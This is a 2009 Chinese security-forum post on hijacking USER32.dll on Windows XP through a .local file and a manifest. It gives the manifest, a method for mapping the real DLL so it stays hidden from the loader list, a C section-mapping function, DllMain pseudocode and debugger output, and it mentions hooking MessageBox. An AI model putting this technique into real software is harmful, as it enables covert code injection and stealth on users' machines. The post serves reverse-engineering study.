你首先要了解PE,看了神奇的马甲DLL后,发现XP下可以劫持USER32.dll,xx.exe.local(为0字节就行),xx.exe.mainfest
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright ? 1981-2001 Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<noInheritable/>
<assemblyIdentity
type="win32"
name="DllHijackerTest"
version="8.0.50608.0"
processorArchitecture="amd64"
publicKeyToken="1fc8b3b9a1e18e3b"
/>
<file name="user32.dll"/>//关键一行
<file name="msvcp80.dll"/>
<file name="msvcm80.dll"/>
</assembly>
-------------------------------------------------------------------------------------------
hijackuser32 工程为导出所有user32。dll
流程:
1必须导出所有函数,因为realUser32。dll的importTable里的DLL又导入USER32.dll
的函数.
2,用CreateSection方法加载真实DLL.
3,在DLLMAIN里修复importTable,记录真实EXPORT函数地址.
4,调用realUser32(SECTION).DLLENTRYPOINT
效果:
在感染进程里LDR链表没这realUser32
WDBG
0:001> lm
start end module name
00400000 0042c000 DllHijackerTest (deferred)
00a10000 00a3a000 safemon (deferred)
10000000 1004e000 USER32 (deferred) //VIRUS
5d170000 5d20a000 comctl32_5d170000 (deferred)
62c20000 62c29000 LPK (deferred)
73640000 7366e000 msctfime (deferred)
73fa0000 7400b000 USP10 (deferred)
74680000 746cb000 MSCTF (deferred)
76300000 7631d000 IMM32 (deferred)
76990000 76acd000 ole32 (deferred)
76bc0000 76bcb000 PSAPI (deferred)
770f0000 7717b000 OLEAUT32 (deferred)
77180000 77283000 COMCTL32 (deferred)
77be0000 77c38000 msvcrt (deferred)
77d10000 77d9f000 USER32_77d10000 (deferred) //
77da0000 77e49000 ADVAPI32 (deferred)
77e50000 77ee2000 RPCRT4 (deferred)
77ef0000 77f38000 GDI32 (deferred)
77f40000 77fb6000 SHLWAPI (deferred)
77fc0000 77fd1000 Secur32 (deferred)
7c800000 7c91d000 kernel32 (deferred)
7c920000 7c9b4000 ntdll (pdb symbols) f:\dbgsym\ntdll.pdb\36515FB5D04345E491F672FA2E2878C02\ntdll.pdb
7d590000 7dd83000 SHELL32 (deferred)
PVOID MapDllImageBase( NT::UNICODE_STRING* fname )
{
HANDLE hdll = NULL;
HANDLE hSec = NULL;
PVOID dllbase = (PVOID)0;
NT::OBJECT_ATTRIBUTES ob = {0};
NT::LARGE_INTEGER off = {0};
ULONG viewSize = 0;
DWORD relen;
ob.Attributes = OBJ_CASE_INSENSITIVE;
ob.Length = sizeof(ob);
ob.ObjectName = fname;
NT::IO_STATUS_BLOCK iosb;
// NT::InitializeObjectAttributes( &ob, fname, OBJ_CASE_INSENSITIVE, 0, 0 );
// hdll = CreateFile( fname, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL|FILE_SYNCHRONOUS_IO_NONALERT, NULL );
NT::ZwOpenFile(&hdll,FILE_READ_DATA|FILE_EXECUTE|SYNCHRONIZE, &ob, &iosb,
FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);
ob.ObjectName = NULL;
NT::ZwCreateSection( &hSec, SECTION_ALL_ACCESS, &ob, 0, PAGE_EXECUTE, SEC_IMAGE , hdll );
NT::ZwQuerySection( hSec, NT::SectionBasicInformation, &SecBaseInfo, sizeof( SecBaseInfo ), &relen );
NT::ZwQuerySection( hSec, NT::SectionImageInformation, &SecImageInfo, sizeof( SecImageInfo ), &relen );
viewSize = SecBaseInfo.Size.QuadPart;
NT::ZwMapViewOfSection( hSec, GetCurrentProcess(), &dllbase, 0, viewSize, &off, &viewSize, NT::ViewShare, MEM_TOP_DOWN, PAGE_EXECUTE );
//NT::ZwUnmapViewOfSection( GetCurrentProcess(), dllbase );
//CloseHandle( hSec );
CloseHandle( hdll );
return dllbase;
};
dllmain()
{
h = CreateSection
记录真实EXPORT的相应地址----------A
FixImport( h );---------------------------B
(A and B 不能倒位置,呵呵,自己调试就清楚了)
__asm push 0
__asm push 1
__asm push h
__asm mov eax,entry
__asm call eax
};
我HOOK 并操作了 MESSAGEBOX,
附件:
DllHijackerTest
hijackuser32
ZyDllToC(自动生成部分代码)
- 标 题:DLL劫持USER32
- 作 者:SafeNdis
- 时 间:2009-01-14 19:27
- 链 接:http://bbs.pediy.com/showthread.php?t=80477